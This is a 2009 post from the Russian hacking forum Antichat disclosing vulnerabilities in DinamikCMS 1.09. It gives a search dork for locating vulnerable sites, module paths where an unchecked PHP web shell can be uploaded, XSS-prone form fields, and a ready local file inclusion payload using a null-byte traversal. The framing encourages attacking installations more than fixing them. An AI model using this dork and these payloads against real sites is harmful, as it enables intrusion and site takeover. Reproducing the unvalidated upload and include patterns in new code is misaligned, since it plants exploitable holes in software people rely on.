Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Уязвимости DinamikCMS (https://forum.antichat.xyz/showthread.php?t=99542)

Twoster 05.01.2009 10:41
Уязвимости DinamikCMS
 
Уязвимый продукт: DinamikCMS
Версия: 1.09
Дорк: Powered by DinamikCMS v.1.09

Просто удивительная CMS

1. Заливка шелла
cms_site.ru/?pg=module/files/addfiles
cms_site.ru/?pg=module/galerea/addfoto
Загружаемые файлы совершенно не проверяются, можно загрузить шелл c расширением .php абсолютно безо всяких проблем! =)

2. XSS
a) добавляем статью, в поле "Предисловие" отлично проходит XSS
cms_site.ru/?pg=module/article/addarticle
b) Редактирование профиля, XSS подвержены все поля
cms_site.ru/?pg=edituser

3. Локальный инклуд
cms_site.ru/?pg=../.htaccess%00


Время: 17:22